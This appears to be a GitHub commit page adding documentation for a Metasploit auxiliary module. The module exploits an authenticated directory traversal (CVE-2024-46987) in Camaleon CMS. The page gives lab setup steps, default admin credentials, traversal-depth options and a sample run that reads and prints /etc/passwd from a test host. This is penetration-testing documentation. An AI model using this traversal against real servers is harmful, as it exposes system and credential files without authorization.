Skip to content

Commit 08f6dc2

Browse files
jheysel-r7jheysel-r7
authored
Merge pull request #21122 from bootstrapbool/camaleon_cms_cve_2024_46987
Camaleon CMS CVE 2024 46987
2 parents 92af54c + d530230 commit 08f6dc2

2 files changed

Lines changed: 455 additions & 0 deletions

File tree

documentation/modules/auxiliary/gather/camaleon_download_private_file.md

Lines changed: 216 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,216 @@
1+
## Vulnerable Application
2+
3+
This module attempts to read files from an authenticated directory traversal vuln in Camaleon CMS versions <= 2.8.0 and version 2.9.0.
4+
5+
CVE-2024-46987 mistakenly indicates that versions 2.8.1 and 2.8.2 are also vulnerable, however this is not the case.
6+
7+
## Setup
8+
9+
See [Camaleon CMS](https://github.com/owen2345/camaleon-cms) documentation.
10+
11+
The following describes how to setup Camaleon CMS version 2.8.0 on Ubuntu.
12+
13+
### Requirements
14+
15+
- Rails 6.1+
16+
- PostgreSQL, MySQL 5+ or SQlite
17+
- Ruby 3.0+
18+
- Imagemagick
19+
20+
### Install Ruby
21+
22+
guides.rubyonrails.org/install_ruby_on_rails.html
23+
24+
~~~bash
25+
sudo apt install build-essential rustc libssl-dev libyaml-dev zlib1g-dev libgmp-dev git curl
26+
~~~
27+
28+
### Install Mise
29+
30+
~~~bash
31+
curl https://mise.run | sh
32+
echo "eval \"\$(~/.local/bin/mise activate)\"" >> ~/.bashrc
33+
source ~/.bashrc
34+
~~~
35+
36+
### Install Ruby with Mise
37+
38+
~~~bash
39+
$ mise use -g ruby@3.0
40+
41+
$ ruby --version
42+
ruby 3.0.7p220 ...
43+
~~~
44+
45+
### Install Imagemagick
46+
47+
~~~bash
48+
sudo apt install --no-install-recommends imagemagick
49+
~~~
50+
51+
### Install Postgresql
52+
53+
~~~bash
54+
sudo apt install postgresql
55+
~~~
56+
57+
### Install Rails
58+
59+
~~~bash
60+
$ gem install rails -v 6.1
61+
~~~
62+
63+
#### concurrent-ruby Issue
64+
65+
Downgrade concurrent-ruby to 1.3.4
66+
67+
~~~bash
68+
$ gem list concurrent-ruby
69+
concurrent-ruby (1.3.6)
70+
71+
$ gem install concurrent-ruby -v 1.3.4
72+
$ gem uninstall concurrent-ruby -v 1.3.6
73+
74+
$ rails --version
75+
Rails 6.1.7.10
76+
~~~
77+
78+
### Create Rails Project
79+
80+
Run `rails new camaleon_project`
81+
82+
### Gemfile
83+
84+
In your Gemfile do the following:
85+
86+
Replace `gem 'spring'` with `gem 'spring', '4.2.1'`
87+
88+
89+
Delete this line to prevent [conflict](https://github.com/owen2345/camaleon-cms/issues/1111): `gem 'sass-rails', '>= 6'`
90+
91+
Put these lines at the bottom of your Gemfile:
92+
93+
~~~
94+
gem 'camaleon_cms', '2.8.0'
95+
gem 'concurrent-ruby', '1.3.4'
96+
~~~
97+
98+
### Install Bundle
99+
100+
From the project directory run `bundle install`
101+
102+
### Webpacker.yml Issue
103+
104+
~~~bash
105+
wget -O camaleon_project/config/webpacker.yml https://raw.githubusercontent.com/rails/webpacker/master/lib/install/config/webpacker.yml
106+
~~~
107+
108+
### Camaleon CMS Installation
109+
110+
~~~bash
111+
rails generate camaleon_cms:install
112+
rake camaleon_cms:generate_migrations
113+
rake db:migrate
114+
~~~
115+
116+
### Run Rails
117+
118+
~~~bash
119+
bundle exec rails server -b 0.0.0.0
120+
~~~
121+
122+
Navigate to `http://{ip address}:3000` and enter test under the Name field.
123+
124+
### Setup Server
125+
126+
When prompted with the new installation page just enter "test" into the Name field and continue.
127+
128+
#### Create Unprivileged User (Optional)
129+
130+
Navigate to `http://{ip address}:3000/admin` - login with the default admin credentials "admin:admin123"
131+
132+
Then navigate to "Users -> + Add User" and fill out the form.
133+
134+
## Verification Steps
135+
136+
1. Do: `use auxiliary/gather/camaleon_download_private_file`
137+
2. Do: `set RHOST [IP]`
138+
3. Do: `run`
139+
140+
## Options
141+
142+
### FILEPATH
143+
144+
The filepath of the file to read.
145+
146+
### DEPTH
147+
148+
The number of "../" appended to the filename. Default is 13
149+
150+
## Scenarios
151+
152+
```
153+
msf > use auxiliary/gather/camaleon_download_private_file
154+
msf auxiliary(gather/camaleon_download_private_file) > set rhost 10.0.0.45
155+
rhost => 10.0.0.45
156+
msf auxiliary(gather/camaleon_download_private_file) > set rport 3000
157+
rport => 3000
158+
msf auxiliary(gather/camaleon_download_private_file) > set ssl false
159+
ssl => false
160+
msf auxiliary(gather/camaleon_download_private_file) > run
161+
[*] Running module against 10.0.0.45
162+
[+] /etc/passwd stored as '/home/kali/.msf4/loot/20260411192711_default_10.0.0.45_camaleon.travers_926890.txt'
163+
164+
root:x:0:0:root:/root:/bin/bash
165+
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
166+
bin:x:2:2:bin:/bin:/usr/sbin/nologin
167+
sys:x:3:3:sys:/dev:/usr/sbin/nologin
168+
sync:x:4:65534:sync:/bin:/bin/sync
169+
games:x:5:60:games:/usr/games:/usr/sbin/nologin
170+
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
171+
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
172+
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
173+
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
174+
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
175+
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
176+
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
177+
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
178+
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
179+
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
180+
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
181+
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
182+
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
183+
systemd-timesync:x:996:996:systemd Time Synchronization:/:/usr/sbin/nologin
184+
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
185+
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
186+
syslog:x:102:102::/nonexistent:/usr/sbin/nologin
187+
systemd-resolve:x:991:991:systemd Resolver:/:/usr/sbin/nologin
188+
uuidd:x:103:103::/run/uuidd:/usr/sbin/nologin
189+
usbmux:x:104:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
190+
tss:x:105:105:TPM software stack,,,:/var/lib/tpm:/bin/false
191+
systemd-oom:x:990:990:systemd Userspace OOM Killer:/:/usr/sbin/nologin
192+
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
193+
whoopsie:x:107:109::/nonexistent:/bin/false
194+
dnsmasq:x:999:65534:dnsmasq:/var/lib/misc:/usr/sbin/nologin
195+
avahi:x:108:111:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
196+
tcpdump:x:109:112::/nonexistent:/usr/sbin/nologin
197+
sssd:x:110:113:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
198+
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
199+
cups-pk-helper:x:112:114:user for cups-pk-helper service,,,:/nonexistent:/usr/sbin/nologin
200+
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
201+
saned:x:113:116::/var/lib/saned:/usr/sbin/nologin
202+
geoclue:x:114:117::/var/lib/geoclue:/usr/sbin/nologin
203+
cups-browsed:x:115:114::/nonexistent:/usr/sbin/nologin
204+
hplip:x:116:7:HPLIP system user,,,:/run/hplip:/bin/false
205+
gnome-remote-desktop:x:988:988:GNOME Remote Desktop:/var/lib/gnome-remote-desktop:/usr/sbin/nologin
206+
polkitd:x:987:987:User for polkitd:/:/usr/sbin/nologin
207+
rtkit:x:117:119:RealtimeKit,,,:/proc:/usr/sbin/nologin
208+
colord:x:118:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
209+
gnome-initial-setup:x:119:65534::/run/gnome-initial-setup/:/bin/false
210+
gdm:x:120:121:Gnome Display Manager:/var/lib/gdm3:/bin/false
211+
nm-openvpn:x:121:122:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
212+
bittman:x:1000:1000:bittman:/home/bittman:/bin/bash
213+
postgres:x:122:124:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
214+
215+
[*] Auxiliary module execution completed
216+
```

0 commit comments

Comments
 (0)